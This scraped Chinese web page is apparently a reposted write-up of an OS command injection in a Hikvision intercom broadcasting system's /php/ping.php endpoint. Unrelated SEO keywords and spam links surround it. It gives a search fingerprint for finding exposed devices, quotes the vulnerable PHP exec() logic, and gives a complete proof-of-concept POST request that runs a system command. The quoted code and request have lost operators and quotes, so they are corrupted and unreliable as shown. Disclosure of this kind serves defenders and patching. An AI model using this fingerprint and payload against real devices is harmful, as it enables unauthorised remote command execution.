当前位置: 首页 > news >正文

企业管理咨询顾问长沙网站seo优化

news 2026/4/20 4:02:40
企业管理咨询顾问,长沙网站seo优化,二级建造师证书查询,手工制作简单易学漏洞介绍 海康威视IP网络对讲广播系统采用领先的IPAudio™技术,将音频信号以数据包形式在局域网和广域网上进行传送,是一套纯数字传输系统。 Hikvision Intercom Broadcasting System 3.0.3_20201113_RELEASE(HIK)版本存在操作系统命令注入漏洞#xff0c;该漏洞源于文件/ph…漏洞介绍 海康威视IP网络对讲广播系统采用领先的IPAudio™技术,将音频信号以数据包形式在局域网和广域网上进行传送,是一套纯数字传输系统。 Hikvision Intercom Broadcasting System 3.0.3_20201113_RELEASE(HIK)版本存在操作系统命令注入漏洞该漏洞源于文件/php/ping.php的参数jsondata[ip]会导致操作系统命令注入。 资产测绘 icon_hash“-1830859634” 漏洞复现 查看漏洞关键代码 header(Content-type: text/html; charsetGB2312); $postData $_POST[jsondata]; if(isset($postData[ip]) isset($postData[type])){$type $postData[type];//类型$ip $postData[ip];//IP地址$arr systemopr($type, $ip);$len count($arr);for($i 0; $i $len; $i){if(isset($arr[$i])){$arr[$i] iconv(GB2312, UTF-8, $arr[$i]);//gb2312转换为utf-8}}$after json_encode($arr);//转换成jsonecho $after; }function systemopr($type, $ip, $times4){$info array(); if (PATH_SEPARATOR: || DIRECTORY_SEPARATOR/){//linuxif($type 0){exec(ping -c $times $ip, $info);}else if($type 1){exec(traceroute -m $times -w 1 $ip, $info);}else{exec($ip, $info);}}else{//windowsif($type 0){exec(ping $ip -n $times, $info);}else if($type 1){exec(tracert -h $times -w 1000 $ip, $info);}else{exec($ip, $info);}}return $info; }可以发现当$postData[type]和$postData[ip]存在值时则会传入systemopr函数通过exec()函数进行拼接命令执行当$postData[type]等于0或1时则代入指定代码段执行指定命令。但$postData[type]参数值不等于0和1时可以不考虑参数闭合直接可以通过$postData[ip]执行任意命令。而且恰巧$postData[type]和$postData[ip]的值都是POST传参可控的导致我们可以执行任意系统命令。 POC如下 POST /php/ping.php HTTP/1.1 Host: your_ip Content-Length: 46 Pragma: no-cache Cache-Control: no-cache Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: text/html,application/xhtmlxml,application/xml;q0.9,image/avif,image/webp,image/apng,*/*;q0.8,application/signed-exchange;vb3;q0.7 Accept-Encoding: gzip, deflate, br Accept-Language: zh-CN,zh;q0.9 Connection: closejsondata%5Btype%5D3jsondata%5Bip%5Dipconfig 修复建议 目前厂商已发布升级补丁以修复漏洞补丁获取链接 https://www.spon.com.cn/
http://www.hkea.cn/news/14336437/

相关文章:

  • 青岛房地产网站建设珠海 网站建设
  • 网站的基础建设项目wordpress 后台演示
  • 深圳好点的网站建设公司建设部2018年工作要点网站
  • 螺旋钢管网站建设WordPress成绩查询
  • 做的网站一模一样会被告吗企业网站推广的方法有哪几种
  • flask 简易网站开发一个备案可以做几个网站
  • 长春公司做网站找哪个公司好黑龙江住房和城乡建设网
  • 马云做网站最早企业vi手册
  • 网站网站代理可以做不为什么电脑打开那个做网站都是那一个
  • 网站常用特效网站建设论文500字
  • 网站广告代码app源码下载
  • 浙江省火电建设公司网站合肥网红
  • 企业网站访问量的第一来源是( )淘宝官网首页登录注册
  • 微信分享网站短链接怎么做深圳定制数控机床
  • 做海报去哪个网站找素材比较好呢wordpress更换头像
  • 网站开发课设报告书品牌网站的推广
  • 给网站开发一个计算器功能佛山网络公司策划
  • 用ps怎么做网站企业可以做哪些网站有哪些内容吗
  • 自己怎么做优惠搜网站微商做图王官方网站
  • 做网站6个月心得手机建网站优帮云
  • 网站开发难题区域名 网站建设公司的销售好做吗
  • 网站文案的重要性crm系统哪种品牌的好
  • 宝安网站设计项目做网站什么语言好
  • 网站建设的费用记什么科目中国人才网
  • 十堰网站制作价格坑梓网站建设基本流程
  • 自助建站教程wordpress主题字体更改
  • redis网站开发教程网络工程师面试题
  • 营销型企业网站优化维启网站建设
  • 江苏省建设工程质量监督站网站泉州pc网站开发
  • 昆明企业网站建设公司wordpress主题模板中国